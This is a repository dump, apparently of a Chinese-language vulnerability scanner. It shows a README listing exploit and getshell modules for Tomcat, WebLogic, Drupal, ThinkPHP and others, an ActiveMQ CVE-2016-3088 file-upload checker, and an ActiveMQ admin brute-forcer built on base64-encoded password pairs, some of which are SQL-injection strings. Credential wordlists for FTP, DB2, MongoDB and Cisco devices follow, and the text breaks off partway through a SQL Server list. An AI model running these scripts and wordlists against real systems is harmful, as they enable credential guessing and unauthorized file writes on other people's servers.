├── .gitignore ├── .vscode └── settings.json ├── README.md ├── activemq_vuln ├── ActiveMQ_uploadfile_cve_2016_3088.py ├── Activemq_weakpasswd.py ├── Main_activemq.py └── __init__.py ├── bf_dicts ├── CISCO-equitment-passwd.txt ├── DB2-passwd.txt ├── DB2-user.txt ├── FTP-passwd.txt ├── FTP-user.txt ├── MONGODB-passwd.txt ├── MONGODB-user.txt ├── Main_bf.py ├── Microsoft_SQL_Server-passwd.txt ├── Microsoft_SQL_Server-user.txt ├── MySQL-passwd.txt ├── MySQL-user.txt ├── ORACLE-passwd.txt ├── ORACLE-user.txt ├── POP3-passwd.txt ├── POP3-user.txt ├── RDP-passwd.txt ├── RDP-user.txt ├── SMB-passwd.txt ├── SMB-user.txt ├── SNMPpasswd.txt ├── SSH-passwd.txt ├── SSH-user.txt ├── SYBASE-passwd.txt ├── SYBASE-user.txt ├── TELNET-passwd.txt ├── TELNET-user.txt ├── TOMCAT-passwd.txt ├── TOMCAT-user.txt ├── __init__.py ├── bf.py ├── 通用-常见口令列表.txt └── 通用-常见用户名列表.txt ├── docker_vuln ├── Main_docker.py ├── __init__.py └── docker_daemon_api.py ├── durpal ├── CVE_2014_3704.py ├── CVE_2018_7600.py ├── Main_durpal.py └── __init__.py ├── fckeditor ├── Main_fckeditor.py ├── __init__.py ├── fckeditor_dangerfile.py ├── fckeditor_getshell.py ├── fckeditor_version.py └── shell.asa ├── gatepass_vuln ├── Gate_Pass_Management_System_login_SQL_Injection.py ├── Main_gatepass.py └── __init__.py ├── iis ├── Main_iis.py ├── __init__.py └── iis_shortname_Scan.py ├── jboss ├── Main_jboss.py ├── __init__.py ├── _exploits.py ├── _updates.py └── jexboss.py ├── js_find ├── Main_js_find.py ├── __init__.py └── js_find.py ├── kindeditor ├── Main_kindeditor.py ├── __init__.py └── kindeditor_under_4_1_5_fileupload.py ├── memcache_vuln ├── Main_memcache_vuln.py ├── __init__.py └── memcache_un.py ├── moon.py ├── navigate_vuln ├── 88.php ├── Main_navigate.py ├── __init__.py └── navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553.py ├── redis_vuln ├── Main_redis.py ├── __init__.py └── redis_unauthorized.py ├── requirements.txt ├── search_exploits ├── Main_search_exploits.py ├── __init__.py └── search_exploit.py ├── spring_vuln ├── CVE_2018_1273.py ├── Main_spring.py └── __init__.py ├── thinkphp ├── Main_thinkphp.py ├── __init__.py ├── thinkphp5_inj_info.py ├── thinkphp5_x_rce.py └── thinkphp_before5_0_23_rce.py ├── tomcat ├── CVE_2017_12615.py ├── CVE_2017_12617.py ├── CVE_2020_1938.py ├── Main_tomcat.py ├── __init__.py ├── example_vulnerability.py └── tomcat_weakpasswd.py ├── weblogic ├── CNVD_C_2019_48814.py ├── CVE_2017_10271.py ├── CVE_2017_3506.py ├── CVE_2018_2628.py ├── CVE_2019_2725.py ├── Common_page.py ├── Main_weblogic.py ├── __init__.py ├── ssrf.py └── weblogic_weakpasswd.py └── zabbix_vuln ├── Authentication_Bypass.py ├── Main_zabbix.py ├── __init__.py └── zabbix_sql_CVE_2016_10134.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | 3 | __pycache__/ 4 | 5 | *.py[cod] 6 | 7 | *$py.class 8 | 9 | *.xml 10 | *.iml 11 | *.log 12 | .vscode/settings.json 13 | -------------------------------------------------------------------------------- /.vscode/settings.json: -------------------------------------------------------------------------------- 1 | { 2 | "python.linting.flake8Enabled": true, 3 | "python.linting.pylintEnabled": false, 4 | "python.linting.enabled": true, 5 | "python.pythonPath": "C:\\python3\\python.exe" 6 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # vulnerability-list 2 | 3 | 常见漏洞快速检测,目前包含以下漏洞的检测。 4 | 测试环境为win10,python3。 5 | 使用前需安装相关库:py -3 -m pip install -r requirements.txt 6 | 有问题可提issues,最好附上报错截图。 7 | 8 | 已发现的BUG: 9 | 10 | 1. 有些漏洞的判断依据为网页返回信息,但部分网站设置了统一的错误页面,如统一的404页面,因此造成误报。后续针对此类问题通用的解决方式是显示返回页面的大小。 11 | 2. 有些地方有渣渣的硬编码,比如路径什么的,导致不同环境下可能会报错,遇到这样的问题,使用单独的脚本进行测试,或者自己改一下路径,有时间的话会处理一下。 12 | 13 | ## Tomcat 14 | 15 | - CVE_2017_12615 / CVE_2017_12617 16 | - tomcat_weakpassword 17 | - example_vulnerability(检测tomcat的examples等目录是否存在) 18 | - CNVD-C-2019-48814/CVE-2020-1938 #Apache Tomcat文件包含 参考: 19 | 20 | > moon.py -u tomcat 21 | 22 | ## Fckeditor 23 | 24 | - 获取版本及常见上传页面检测 25 | - fck<=2.4版本上传直接上传asa文件getshell 26 | 27 | > moon.py -u fck 28 | 29 | ## Weblogic 30 | 31 | - CVE_2017_10271 # 利用方法参考: 32 | - weblogic_ssrf_cve-2014-4210 33 | - weblogic_weakpassword 34 | - CVE-2018-2628 # Author:xxlegend 35 | - CNVD-C-2019-48814 36 | - CVE-2019-2725 # 参考: 37 | 38 | > moon.py -u weblogic 39 | 40 | ## IP归属查询 41 | 42 | - 能简单查一下IP的归属地 43 | 44 | > moon.py -u ip 45 | 46 | ## IIS 47 | 48 | - 短文件名泄露 #来自 lijiejie/IIS_shortname_Scanner 49 | 50 | > moon.py -u iis 51 | 52 | ## Docker 53 | 54 | - docker_daemon_api未授权访问 55 | 56 | > moon.py -u docker 57 | 58 | ## Redis 59 | 60 | - redis未授权访问 61 | 62 | > moon.py -u redis or moon.py -u redis xx.xx.xx.xx:xxxx 63 | 64 | ## Zabbix 65 | 66 | - zabbix_sql_CVE_2016_10134 #有参考独自等待的脚本 67 | 68 | > moon.py -u zabbix 69 | 70 | ## Navigate 71 | 72 | - navigate_Unauthenticated_Remote_Code_Execution #利用方法参考 73 | 74 | > moon.py -u navigate 75 | 76 | ## Gatepass 77 | 78 | - Gate Pass Management System 2.1 - 'login' SQL Injection # 参考 79 | 80 | > moon.py -u gatepass 81 | 82 | ## Jboss 83 | 84 | - admin-console 85 | - Checking Struts2 86 | - Checking Servlet Deserialization 87 | - Checking Application Deserialization 88 | - Checking Jenkins 89 | - Checking web-console 90 | - Checking jmx-console 91 | - JMXInvokerServlet 92 | - 此模块调用的是 # jexboss 使用此模块时,建议在微软新推出的terminal中使用,或者直接下载jexboss进行测试 93 | 94 | > moon.py -u jboss 95 | 96 | ## Kindeditor 97 | 98 | - kindeditor<=4.1.5文件上传漏洞 99 | 100 | > moon.py -u kindeditor 101 | 102 | ## Drupal 103 | 104 | - Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704) 105 | - Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600) # 106 | 107 | > moon.py -u drupal 108 | 109 | ## Thinkphp 110 | 111 | - thinkphp_before5_0_23_rce 112 | - thinkphp5_inj_info 113 | - thinkphp5_x_rce 114 | 115 | > moon.py -u thinkphp 116 | 117 | ## Memcache 118 | 119 | - 未授权访问 120 | 121 | > moon.py -u memcache 122 | 123 | ## Js 124 | 125 | - js代码中敏感信息收集 # 主要参考 By Threezh1 126 | 127 | > moon.py -u js 128 | 129 | ## search_exploits 130 | 131 | - 在 exploitalert 中搜索某中间件存在的历史漏洞 132 | 133 | > moon.py -u exploits xxxxxx 134 | 135 | ![search_exploits](https://raw.githubusercontent.com/1120362990/Paper/master/images/vulnerability-list-images/search_exploits.png) 136 | 137 | ## ActiveMQ 138 | 139 | - activemq管理后台弱口令检测 140 | - CVE-2016-3088 activemq文件上传测试,这里只测试文件上传这个步骤,后续的MOVE操作请自行测试 141 | 142 | > moon.py -u activemq 143 | 144 | 请勿用于违法行为,后果自负。 145 | -------------------------------------------------------------------------------- /activemq_vuln/ActiveMQ_uploadfile_cve_2016_3088.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | import string 4 | from random import * 5 | import time 6 | 7 | 8 | ''' 9 | Usage: 10 | moon.py -u activemq http://xx.xx.xx.xx:xxxx 11 | CVE-2016-3088 12 | 影响范围:Apache ActiveMQ 5.0.0 - 5.13.2 在5.12.x~5.13.x已默认关闭 5.14彻底删除相关文件 13 | 简介:ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷。在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。 14 | 漏洞原理:ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录,构造PUT请求上传 webshell 到 fileserver 目录,然后通过 Move 方法将其移动到有执行权限的 admin/ 目录。这里移动文件需要具有相关权限,因此要想拿shel需要有activemq的账户和密码。 15 | 这里只测试上传这一步看看是否可行 16 | ''' 17 | 18 | def attack(URL): 19 | print('[+]开始检测-ActiveMQ任意文件写入漏洞(CVE-2016-3088)。[+]') 20 | filename = gen_shell() 21 | url = URL + '/fileserver/'+filename+'.txt' 22 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 23 | headers={"User-Agent":user_agent} 24 | data="""CVE-2016-3088-file_upload_test""" 25 | try: 26 | requests.put(url, headers=headers, data=data) 27 | time.sleep(2) 28 | verify_response = requests.get(url, headers=headers) 29 | if verify_response.status_code == 200 and 'CVE-2016-3088-file_upload_test' in verify_response.text: 30 | print('文件上传成功!!!') 31 | print('上传文件地址: ' + url) 32 | else : 33 | print('访问上传文件地址:'+verify_response.status_code) 34 | print("未能成功上传文件。") 35 | except : 36 | print("未发现-ActiveMQ任意文件写入漏洞(CVE-2016-3088)。") 37 | print('[+]检测结束-ActiveMQ任意文件写入漏洞(CVE-2016-3088)。[+]') 38 | print('\n') 39 | def gen_shell(): 40 | min_char = 4 41 | max_char = 12 42 | allchar = string.ascii_letters + string.digits 43 | shell_name = "".join(choice(allchar) for x in range(randint(min_char, max_char))) 44 | return shell_name 45 | 46 | 47 | if __name__ == "__main__": 48 | attack() 49 | -------------------------------------------------------------------------------- /activemq_vuln/Activemq_weakpasswd.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | import base64 4 | 5 | ''' 6 | Usage: 7 | moon.py -u activemq http://xx.xx.xx.xx:xxxx 8 | http://xx.xx.xx.xx:8161/admin/ 弱口令 admin admin 9 | ''' 10 | 11 | def attack(URL): 12 | print('[+]开始检测-ActiveMQ弱口令。[+]') 13 | url = URL +'/admin' 14 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 15 | headers={"User-Agent":user_agent} 16 | passwords = ['YWRtaW46IUAjJCVeJio=', 'YWRtaW46IUAjJCVeJg==', 'YWRtaW46IUAjJCVe', 'YWRtaW46IUAjJCU=', 'YWRtaW46IUAjJA==', 'YWRtaW46QCMkJV4m', 'YWRtaW46MA==', 'YWRtaW46MDAwMDAw', 'YWRtaW46MDAwMDAwYQ==', 'YWRtaW46MTAwMjAw', 'YWRtaW46MTAxMDEw', 'YWRtaW46MTEwMTEw', 'YWRtaW46MTEwMTIw', 'YWRtaW46MTEwMTIwMTE5', 'YWRtaW46MTExMTE=', 'YWRtaW46MTExMTEx', 'YWRtaW46MTExMTExMQ==', 'YWRtaW46MTExMTExMTE=', 'YWRtaW46MTExMTExMTEx', 'YWRtaW46MTExMTExMTExMQ==', 'YWRtaW46MTExMTExYQ==', 'YWRtaW46MTExMjIy', 'YWRtaW46MTEyMjMz', 'YWRtaW46MTEyMjMzNDQ=', 'YWRtaW46MTEyMzU4MTMyMQ==', 'YWRtaW46MTIxMjEy', 'YWRtaW46MTIxMjEyMTI=', 'YWRtaW46MTIz', 'YWRtaW46MTIzMDAw', 'YWRtaW46MTIzMTIz', 'YWRtaW46MTIzMTIzMTIz', 'YWRtaW46MTIzMTIzYQ==', 'YWRtaW46MTIzMzIx', 'YWRtaW46MTIzNA==', 'YWRtaW46MTIzNDQzMjE=', 'YWRtaW46MTIzNDU=', 'YWRtaW46MTIzNDU1NDMyMQ==', 'YWRtaW46MTIzNDU2Li4=', 'YWRtaW46MTIzNDU2', 'YWRtaW46MTIzNDU2Nw==', 'YWRtaW46MTIzNDU2Nzg=', 'YWRtaW46MTIzNDU2Nzg5Li4=', 'YWRtaW46MTIzNDU2Nzg5', 'YWRtaW46MTIzNDU2Nzg5MA==', 'YWRtaW46MTIzNDU2Nzg5MDA=', 'YWRtaW46MTIzNDU2Nzg5MQ==', 'YWRtaW46MTIzNDU2Nzg5MTA=', 'YWRtaW46MTIzNDU2Nzg5OQ==', 'YWRtaW46MTIzNDU2Nzg5YQ==', 'YWRtaW46MTIzNDU2Nzg5YWJj', 'YWRtaW46MTIzNDU2Nzg5cQ==', 'YWRtaW46MTIzNDU2Nzg5cXE=', 'YWRtaW46MTIzNDU2YQ==', 'YWRtaW46MTIzNDU2YWE=', 'YWRtaW46MTIzNDU2YUFA', 'YWRtaW46MTIzNDU2YWJj', 'YWRtaW46MTIzNDU2YXNk', 'YWRtaW46MTIzNDU2cQ==', 'YWRtaW46MTIzNDU2cXE=', 'YWRtaW46MTIzNDVh', 'YWRtaW46MTIzNHF3ZXI=', 'YWRtaW46MTIzNjU0', 'YWRtaW46MTIzNjU0Nzg5', 'YWRtaW46MTIzNjk4NzQ1', 'YWRtaW46MTIzYWJj', 'YWRtaW46MTIzcXdl', 'YWRtaW46MTIzcXdlYXNk', 'YWRtaW46MTIzJHF3ZVI=', 'YWRtaW46MTJxd2Fzeng=', 'YWRtaW46MTMxMzEz', 'YWRtaW46MTMxNDUyMA==', 'YWRtaW46MTMxNDUyMDUyMA==', 'YWRtaW46MTMxNDUyMQ==', 'YWRtaW46MTM1NzkyNDY4', 'YWRtaW46MTM1NzkyNDY4MA==', 'YWRtaW46MTQ3MjU4', 'YWRtaW46MTQ3MjU4MzY5', 'YWRtaW46MTQ3MjU4MzY5MA==', 'YWRtaW46MTU5MzU3', 'YWRtaW46MTU5NzUz', 'YWRtaW46MTYzLmNvbQ==', 'YWRtaW46MTY4MTY4', 'YWRtaW46MUEyQjNDNEQ=', 'YWRtaW46MWcydzNlNHI=', 'YWRtaW46MSBvciAxPTE=', 'YWRtaW46MScgb3IgJzEnPScx', 'YWRtaW46MSIgb3IgIjEiPSIx', 'YWRtaW46MScgb3JkZXIgYnkgMS0t', 'YWRtaW46MScgb3JkZXIgYnkgMTAtLQ==', 'YWRtaW46MXAybzNp', 'YWRtaW46MXEydzNl', 'YWRtaW46MXEydzNlNHI=', 'YWRtaW46MXEydzNlNHI1dA==', 'YWRtaW46MXFhejJ3c3g=', 'YWRtaW46MXFheiFRQVo=', 'YWRtaW46MXFhekBXU1g=', 'YWRtaW46MXFhenhzdzI=', 'YWRtaW46MjIyMjIy', 'YWRtaW46MjIyMjIyMg==', 'YWRtaW46MjIyMjIyMjI=', 'YWRtaW46MzE0MTU5MjY=', 'YWRtaW46MzMzMzMz', 'YWRtaW46M2VkYyRSRlY=', 'YWRtaW46NDU2ODUy', 'YWRtaW46NTIwMTMxNA==', 'YWRtaW46NTIwMTMxNDUyMA==', 'YWRtaW46NTIwMTMxNGE=', 'YWRtaW46NTIwNTIw', 'YWRtaW46NTIxMTMxNA==', 'YWRtaW46NTIxNTIx', 'YWRtaW46NTU1NTU1', 'YWRtaW46NTU1NTU1NTU=', 'YWRtaW46NTg0MTMxNDUyMA==', 'YWRtaW46NTg0NTIw', 'YWRtaW46NTg0NTIwMTMxNA==', 'YWRtaW46NjU0MzIx', 'YWRtaW46NjY2NjY2', 'YWRtaW46NjY2ODg4', 'YWRtaW46NzQxODUyOTYz', 'YWRtaW46NzUzOTUx', 'YWRtaW46Nzc1ODI1OA==', 'YWRtaW46Nzc1ODUyMQ==', 'YWRtaW46Nzc3Nzc3', 'YWRtaW46Nzc3Nzc3Nw==', 'YWRtaW46Nzc3Nzc3Nzc=', 'YWRtaW46Nzg5NDU2', 'YWRtaW46Nzg5NDU2MTIz', 'YWRtaW46Nzg5NDU2MTIzMA==', 'YWRtaW46NzkwMTE5', 'YWRtaW46ODA0ODY=', 'YWRtaW46ODg4ODg4', 'YWRtaW46ODg4ODg4ODg=', 'YWRtaW46ODg4OTk5', 'YWRtaW46OTYwNjI4', 'YWRtaW46OTg3NjU0', 'YWRtaW46OTg3NjU0MzIx', 'YWRtaW46OTg3NjU0MzIxMA==', 'YWRtaW46OTk5OTk5', 'YWRtaW46OTk5OTk5OTk=', 'YWRtaW46OTk5OTk5OTk5', 'YWRtaW46YTAwMDAwMA==', 'YWRtaW46YTExMTExMQ==', 'YWRtaW46YTEyMzEyMw==', 'YWRtaW46YTEyMzMyMQ==', 'YWRtaW46YTEyMzQ1', 'YWRtaW46YTEyM180NTY=', 'YWRtaW46YTEyMzQ1Ng==', 'YWRtaW46YTEyMzQ1Njc4', 'YWRtaW46YTEyMzQ1Njc4OQ==', 'YWRtaW46YTFiMmMz', 'YWRtaW46YTUyMDEzMTQ=', 'YWRtaW46QWFAMTIzNDU=', 'YWRtaW46QWFAMTIzNDU2', 'YWRtaW46QWExMjM0NTYh', 'YWRtaW46QWExMjM0NTYu', 'YWRtaW46QWExMjM0NTY=', 'YWRtaW46QWExMjM0NTY3IQ==', 'YWRtaW46YWExMjM0NTY3ODk=', 'YWRtaW46YWFhMTEx', 'YWRtaW46YWFhMTIz', 'YWRtaW46YWFhMTIzNDU2', 'YWRtaW46YWFhYWFh', 'YWRtaW46YWJjMTIz', 'YWRtaW46YWJjMTIzNDU2', 'YWRtaW46YWJjMTIzNDU2Nzg5', 'YWRtaW46YWJjYWJj', 'YWRtaW46YWJjZDEyMw==', 'YWRtaW46YWJjZDEyMzQ=', 'YWRtaW46YWJjZDEyMzQ1Ng==', 'YWRtaW46YWJjZGVm', 'YWRtaW46YWRtaW4=', 'YWRtaW46YWRtaW44ODg=', 'YWRtaW46YWRtaW5pc3RyYXRvcg==', 'YWRtaW46YWluaTEzMTQ=', 'YWRtaW46YXB0eDQ4Njk=', 'YWRtaW46YXMxMjM0NTY=', 'YWRtaW46YXNkMTIz', 'YWRtaW46YXNkMTIzNDU2', 'YWRtaW46YXNkYXNk', 'YWRtaW46YXNkYXNkMTIz', 'YWRtaW46YXNkZg==', 'YWRtaW46YXNkZmdo', 'YWRtaW46YXNkZmdoamts', 'YWRtaW46YmFuZ29uZ3NoaQ==', 'YWRtaW46Y2FvbmltYQ==', 'YWRtaW46Y2FvbmltYTEyMw==', 'YWRtaW46Y29tcHV0ZXI=', 'YWRtaW46Zm9vdGJhbGw=', 'YWRtaW46ZnVja3lvdQ==', 'YWRtaW46ZnVja3lvdTE=', 'YWRtaW46Z3dlcnR5', 'YWRtaW46Z3dlcnR5MTIz', 'YWRtaW46aGVsbG8xMjM0', 'YWRtaW46aWxvdmV5b3U=', 'YWRtaW46aWxvdmV5b3Ux', 'YWRtaW46bG92ZQ==', 'YWRtaW46bG92ZTEyMw==', 'YWRtaW46bG92ZTEzMTQ=', 'YWRtaW46bXlzcGFjZTE=', 'YWRtaW46bmloYW8xMjM=', 'YWRtaW46bnVsbA==', 'YWRtaW46cGFzc3dk', 'YWRtaW46cGFzc3dvcmQ=', 'YWRtaW46cGFzc3dvcmQx', 'YWRtaW46UGFzc3dvcmQy', 'YWRtaW46UG1zQDEyMzQ=', 'YWRtaW46cHJpbmNlc3M=', 'YWRtaW46cHJpbmNlc3Mx', 'YWRtaW46UEBzc3cwcmQ=', 'YWRtaW46cEBzc3dvcmQ=', 'YWRtaW46cTEyMzQ1Ng==', 'YWRtaW46cTEyMzQ1Njc4OQ==', 'YWRtaW46cTF3MmUz', 'YWRtaW46cTF3MmUzcjQ=', 'YWRtaW46cTF3MkUjUiQ=', 'YWRtaW46UUFaMTIz', 'YWRtaW46cWF6MTIzNDU2', 'YWRtaW46IVFBWjJ3c3g=', 'YWRtaW46cWF6d3N4', 'YWRtaW46cWF6d3N4MTIz', 'YWRtaW46cWF6d3N4ZWRj', 'YWRtaW46IVFBWnhzdzI=', 'YWRtaW46cWF6eHN3MjE=', 'YWRtaW46cXExMjMxMjM=', 'YWRtaW46cXExMjM0NTY=', 'YWRtaW46cXExMjM0NTY3ODk=', 'YWRtaW46cXExMzE0NTIw', 'YWRtaW46cXE1MjAxMzE0', 'YWRtaW46cXdlMTIz', 'YWRtaW46cXdlMTIzNDU2', 'YWRtaW46cXdlYXNk', 'YWRtaW46cXdlcjEyMzQ=', 'YWRtaW46cXdlcnR5', 'YWRtaW46cXdlcnR5MQ==', 'YWRtaW46UXdlcnR5MTI=', 'YWRtaW46cXdlcnR5MTIz', 'YWRtaW46UXdlcnR5MTIzNDU=', 'YWRtaW46cXdlcnR5dWlvcA==', 'YWRtaW46cm9vdA==', 'YWRtaW46cm9vdEBXSlM=', 'YWRtaW46czEyMzQ1Ng==', 'YWRtaW46c3Vuc2hpbmU=', 'YWRtaW46dGFyZ2V0MTIz', 'YWRtaW46dGVzdA==', 'YWRtaW46dGVzdDEyMw==', 'YWRtaW46dGVzdGo=', 'YWRtaW46VXNAMTIzNDU=', 'YWRtaW46dXNlcm5hbWU=', 'YWRtaW46VXNyMTIzNDU=', 'YWRtaW46dzEyMzQ1Ng==', 'YWRtaW46dzEyMzQ1Njc4OQ==', 'YWRtaW46d2FuZzEyMw==', 'YWRtaW46d2FuZzEyMzQ1Ng==', 'YWRtaW46d29haW5p', 'YWRtaW46d29haW5pMTIz', 'YWRtaW46d29haW5pMTMxNA==', 'YWRtaW46d29haW5pMTMxNDUyMA==', 'YWRtaW46d29haW5pNTIw', 'YWRtaW46d29haW5pNTIx', 'YWRtaW46QFdTWGNkZTM=', 'YWRtaW46V3dfMTIzNDU2', 'YWRtaW46d3d3MTIzNDU2', 'YWRtaW46ejEyMzQ1Ng==', 'YWRtaW46ejEyMzQ1Njc4OQ==', 'YWRtaW46emFxMTJ3c3g=', 'YWRtaW46WkFRITJ3c3g=', 'YWRtaW46emhhbmcxMjM=', 'YWRtaW46enhjMTIz', 'YWRtaW46enhjMTIzNDU2', 'YWRtaW46enhjdmJubQ==', 'YWRtaW46enhjdmJubTEyMw==', 'YWRtaW46VGVzdDEyMyQ=', 'YWRtaW46MXEydzNlNHI1dA=='] 17 | try: 18 | requests.get(url, headers=headers) 19 | verify_response = requests.get(url, headers=headers) 20 | if verify_response.status_code == 401: 21 | print('[*]存在web管理界面,开始爆破:'+url) 22 | for passwd in passwords: 23 | try: 24 | headers={"User-Agent":user_agent,"Authorization":'Basic '+passwd} 25 | verify_response = requests.get(url, headers=headers) 26 | if verify_response.status_code == 200: 27 | print('发现弱口令:'+str(base64.b64decode(passwd), "utf-8")) 28 | break 29 | except Exception: 30 | pass 31 | else: 32 | print('未发现管理页面:'+url) 33 | except Exception: 34 | print("检测错误,未发现漏洞。") 35 | print('[+]检测结束-ActiveMQ弱口令。[+]') 36 | print('\n') 37 | 38 | 39 | if __name__ == "__main__": 40 | attack() 41 | -------------------------------------------------------------------------------- /activemq_vuln/Main_activemq.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import activemq_vuln.ActiveMQ_uploadfile_cve_2016_3088 3 | import activemq_vuln.Activemq_weakpasswd 4 | 5 | 6 | def exec(URL): 7 | activemq_vuln.Activemq_weakpasswd.attack(URL) 8 | activemq_vuln.ActiveMQ_uploadfile_cve_2016_3088.attack(URL) 9 | 10 | 11 | if __name__ == "__main__": 12 | exec() 13 | -------------------------------------------------------------------------------- /activemq_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /bf_dicts/CISCO-equitment-passwd.txt: -------------------------------------------------------------------------------- 1 | admin 2 | cisco 3 | netadmin 4 | private 5 | 1234 6 | root 7 | super 8 | abc123 9 | router 10 | public 11 | pento 12 | password 13 | 123456 14 | sysadm 15 | default 16 | iloveyou 17 | qq123456 18 | taobao 19 | wang1234 20 | switch 21 | backdoor 22 | recovery 23 | secure 24 | anicust 25 | d.e.b.u.g 26 | ADTRAN 27 | installer 28 | surt 29 | NetICs 30 | adminttd 31 | D-Link 32 | tech 33 | private 34 | synnet 35 | adtran 36 | hello 37 | security 38 | guest 39 | smile 40 | support 41 | PASSWORD 42 | changeme2 43 | ascend 44 | netopia 45 | echo 46 | pass 47 | corecess 48 | Manager 49 | secret 50 | BRIDGE 51 | atc123 52 | Password 53 | superuser 54 | 123456 55 | emradmin 56 | 12345678 57 | -------------------------------------------------------------------------------- /bf_dicts/DB2-passwd.txt: -------------------------------------------------------------------------------- 1 | 2 | 123 3 | 123123 4 | 123456 5 | 12345678 6 | !@# 7 | !@#$%^ 8 | !@#$%^&* 9 | 111111 10 | 666666 11 | abc 12 | test 13 | 888888 14 | fgh@#$ 15 | 123321 16 | |+_)( 17 | Admin123 18 | 88888888 19 | 66666666 20 | test123 21 | master 22 | admin 23 | root 24 | 11111111 25 | 000000 26 | 8888 27 | 6666 28 | 123!@# 29 | 00000000 30 | 1234567 31 | aaaaaa 32 | 654321 33 | 999999 34 | 222222 35 | password 36 | abcdefg 37 | woaini 38 | iloveyou 39 | exit 40 | 99999999 41 | 333333 42 | 444444 43 | 555555 44 | 6543210 45 | 111222 46 | asdfghjkl 47 | abc123 48 | 666888 49 | zzzzzz 50 | abcd1234 51 | 1234 52 | 12345 53 | abcd 54 | abcde 55 | abcdef 56 | abcdefg 57 | abcdefgh 58 | abcdefghi 59 | Admin123 60 | 123qwe 61 | qazwsx 62 | qweasd 63 | asdfjkl; 64 | `1234567890-= 65 | 1234567890-= 66 | !@#$%^&*()_+ 67 | ~!@#$%^&*()_+ -------------------------------------------------------------------------------- /bf_dicts/DB2-user.txt: -------------------------------------------------------------------------------- 1 | db2inst1 2 | db2admin 3 | Administrator 4 | db2fenc1 5 | dasusr1 6 | -------------------------------------------------------------------------------- /bf_dicts/FTP-passwd.txt: -------------------------------------------------------------------------------- 1 | pssword 2 | 123 3 | 123123 4 | 123456 5 | 12345678 6 | test 7 | xiaoming 8 | !@# 9 | !@#$%^ 10 | !@#$%^&* 11 | 111111 12 | 666666 13 | abc 14 | 888888 15 | qq123456 16 | qwe!@# 17 | taobao 18 | wang1234 19 | qwe!@#123 20 | 123321 21 | |+_)( 22 | Admin123 23 | 88888888 24 | 66666666 25 | 111111 26 | guest 27 | test123 28 | master 29 | admin 30 | root 31 | 11111111 32 | 000000 33 | 8888 34 | 6666 35 | 123!@# 36 | 00000000 37 | 1234567 38 | aaaaaa 39 | 654321 40 | 999999 41 | 222222 42 | password 43 | abcdefg 44 | woaini 45 | iloveyou 46 | exit 47 | 99999999 48 | 333333 49 | 444444 50 | 555555 51 | 999999 52 | 000000 53 | 00000000 54 | 6543210 55 | 111222 56 | asdfghjkl 57 | abc123 58 | 666888 59 | zzzzzz 60 | abcd1234 61 | Guest123 62 | 1234 63 | 12345 64 | ab 65 | abcd 66 | abcde 67 | abcdef 68 | abcdefg 69 | abcdefgh 70 | abcdefghi 71 | Admin123 72 | 123qwe 73 | qazwsx 74 | qweasd 75 | asdfjkl; 76 | `1234567890-= 77 | 1234567890-= 78 | !@#$%^&*()_+ 79 | ~!@#$%^&*()_+ 80 | -------------------------------------------------------------------------------- /bf_dicts/FTP-user.txt: -------------------------------------------------------------------------------- 1 | desc 2 | ftp 3 | root 4 | anonymous 5 | guest 6 | Administrator 7 | user 8 | -------------------------------------------------------------------------------- /bf_dicts/MONGODB-passwd.txt: -------------------------------------------------------------------------------- 1 | 2 | 123 3 | 123123 4 | 123456 5 | 12345678 6 | !@# 7 | !@#$%^ 8 | !@#$%^&* 9 | 111111 10 | 666666 11 | abc 12 | test 13 | 888888 14 | 123321 15 | |+_)( 16 | changeMe 17 | Admin123 18 | testpass 19 | 88888888 20 | 66666666 21 | 111111 22 | guest 23 | test123 24 | master 25 | admin 26 | root 27 | 11111111 28 | 000000 29 | 8888 30 | 6666 31 | 123!@# 32 | 00000000 33 | 1234567 34 | aaaaaa 35 | 654321 36 | 999999 37 | 222222 38 | password 39 | abcdefg 40 | woaini 41 | iloveyou 42 | exit 43 | 99999999 44 | 333333 45 | 444444 46 | 555555 47 | 999999 48 | 000000 49 | 00000000 50 | 6543210 51 | 111222 52 | asdfghjkl 53 | abc123 54 | 666888 55 | zzzzzz 56 | abcd1234 57 | Guest123 58 | 1234 59 | 12345 60 | ab 61 | abcd 62 | abcde 63 | abcdef 64 | abcdefg 65 | abcdefgh 66 | abcdefghi 67 | Admin123 68 | 123qwe 69 | qazwsx 70 | qweasd 71 | asdfjkl; 72 | `1234567890-= 73 | 1234567890-= 74 | !@#$%^&*()_+ 75 | ~!@#$%^&*()_+ -------------------------------------------------------------------------------- /bf_dicts/MONGODB-user.txt: -------------------------------------------------------------------------------- 1 | admin 2 | root 3 | user 4 | test 5 | accountAdmin01 6 | testuser 7 | accountUser 8 | reportsUser 9 | appAdmin 10 | mongouser 11 | -------------------------------------------------------------------------------- /bf_dicts/Main_bf.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import bf_dicts.bf 3 | 4 | 5 | def exec(service,ip,port): 6 | bf_dicts.bf.attack(service,ip,port) 7 | 8 | if __name__ == "__main__": 9 | exec() 10 | -------------------------------------------------------------------------------- /bf_dicts/Microsoft_SQL_Server-passwd.txt: -------------------------------------------------------------------------------- 1 | password 2 | 0 3 | 1 